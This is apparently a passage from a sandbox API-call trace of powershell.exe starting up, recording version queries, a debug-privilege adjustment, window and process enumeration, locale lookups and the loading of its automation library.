	[0105.909] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x0, puLen=0x12e000) returned 0
	[0105.909] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x0, puLen=0x12e000) returned 0
	[0105.909] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x0, puLen=0x12e000) returned 0
	[0105.909] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dfd8, puLen=0x12dfd0 | out: lplpBuffer=0x12dfd8*=0x2d3740c, puLen=0x12dfd0) returned 1
	[0105.910] CoTaskMemAlloc (cb=0x204) returned 0x1642b0
	[0105.910] VerLanguageNameW (in: wLang=0x0, szLang=0x1642b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0105.911] CoTaskMemFree (pv=0x1642b0) 
	[0105.911] VerQueryValueW (in: pBlock=0x2d37370, lpSubBlock="\\", lplpBuffer=0x12e028, puLen=0x12e020 | out: lplpBuffer=0x12e028*=0x2d37398, puLen=0x12e020) returned 1
	[0106.032] GetCurrentProcessId () returned 0x4d8
	[0106.037] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cf50 | out: lpLuid=0x12cf50*(LowPart=0x14, HighPart=0)) returned 1
	[0106.040] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cf70 | out: TokenHandle=0x12cf70*=0x2ec) returned 1
	[0106.041] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2d3abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0106.050] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2d3ac50, cb=0x200, lpcbNeeded=0x12df88 | out: lphModule=0x2d3ac50, lpcbNeeded=0x12df88) returned 1
	[0106.052] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2d3aec0, cb=0x18 | out: lpmodinfo=0x2d3aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0106.053] CoTaskMemAlloc (cb=0x804) returned 0x215170
	[0106.053] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x215170, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0106.053] CoTaskMemFree (pv=0x215170) 
	[0106.054] CoTaskMemAlloc (cb=0x804) returned 0x215170
	[0106.054] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x215170, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0106.054] CoTaskMemFree (pv=0x215170) 
	[0106.055] CloseHandle (hObject=0x2ec) returned 1
	[0106.062] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x4d8) returned 0x2ec
	[0106.063] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x12e0b8 | out: lpExitCode=0x12e0b8*=0x103) returned 1
	[0106.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d3b088, Length=0x20000, ResultLength=0x12e080 | out: SystemInformation=0x12d3b088, ResultLength=0x12e080*=0x12378) returned 0x0
	[0106.198] EnumWindows (lpEnumFunc=0x1f466ac, lParam=0x0) returned 1
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x334
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x324
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.199] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x45c
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x30240, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x774
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x914
	[0106.200] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x9ec
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x610
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb5c
	[0106.200] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xbdc
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x8f0
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb8c
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5e0
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x90
	[0106.201] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.201] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x840
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x844
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x46c
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb40
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x914
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x988
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x914
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x950
	[0106.202] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x914
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x914
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x868
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x850
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x830
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x814
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x744
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x2a8
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x534
	[0106.203] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5e4
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5c4
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x58c
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x238
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x584
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7e8
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x678
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x35c
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x51c
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x360
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x274
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x588
	[0106.204] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc8
	[0106.205] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x21c
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5ec
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x334
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x664
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x334
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x664
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x334
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5ec
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5ec
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x550
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7a0
	[0106.205] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x594
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x564
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x45c
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x548
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x518
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x508
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4ec
	[0106.206] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x45c
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x45c
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x44c
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7ec
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x45c
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x324
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4a0
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x50242, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x774
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x914
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x914
	[0106.207] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x9b4
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x8fc
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xbc0
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb0
	[0106.208] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x804
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xbc8
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x854
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x140
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x55c
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x34c
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb40
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x988
	[0106.208] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x868
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x850
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x830
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x814
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x744
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x2a8
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x534
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5e4
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5c4
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x58c
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x238
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x584
	[0106.209] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7e8
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x678
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x35c
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x51c
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x360
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x274
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x588
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc8
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x21c
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x664
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x334
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5ec
	[0106.210] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x550
	[0106.211] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7a0
	[0106.211] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x594
	[0106.211] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x45c
	[0106.211] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x508
	[0106.211] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4ec
	[0106.211] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x45c
	[0106.211] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7ec
	[0106.215] WerSetFlags () returned 0x0
	[0106.292] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0106.292] CoTaskMemFree (pv=0x0) 
	[0106.293] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12e140 | out: pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12e140) returned 1
	[0106.293] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x2d63cf0, pcchLanguagesBuffer=0x12e140 | out: pulNumLanguages=0x12e148, pwszLanguagesBuffer=0x2d63cf0, pcchLanguagesBuffer=0x12e140) returned 1
	[0106.299] CoTaskMemAlloc (cb=0x24) returned 0x212d50
	[0106.299] GetUserDefaultLocaleName (in: lpLocaleName=0x212d50, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0106.299] CoTaskMemFree (pv=0x212d50) 
	[0106.321] CoTaskMemAlloc (cb=0x104) returned 0x213e50
	[0106.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x213e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.321] CoTaskMemFree (pv=0x213e50) 
	[0106.323] CoTaskMemAlloc (cb=0x104) returned 0x213e50
	[0106.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x213e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.323] CoTaskMemFree (pv=0x213e50) 
	[0106.325] CoTaskMemAlloc (cb=0x104) returned 0x213e50
	[0106.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x213e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.554] CoTaskMemFree (pv=0x213e50) 
	[0106.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0106.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0106.564] SetErrorMode (uMode=0x1) returned 0x1
	[0106.564] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12ddc0 | out: lpFileInformation=0x12ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0106.564] SetErrorMode (uMode=0x1) returned 0x1
	[0106.564] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12e030 | out: lpdwHandle=0x12e030) returned 0x94c
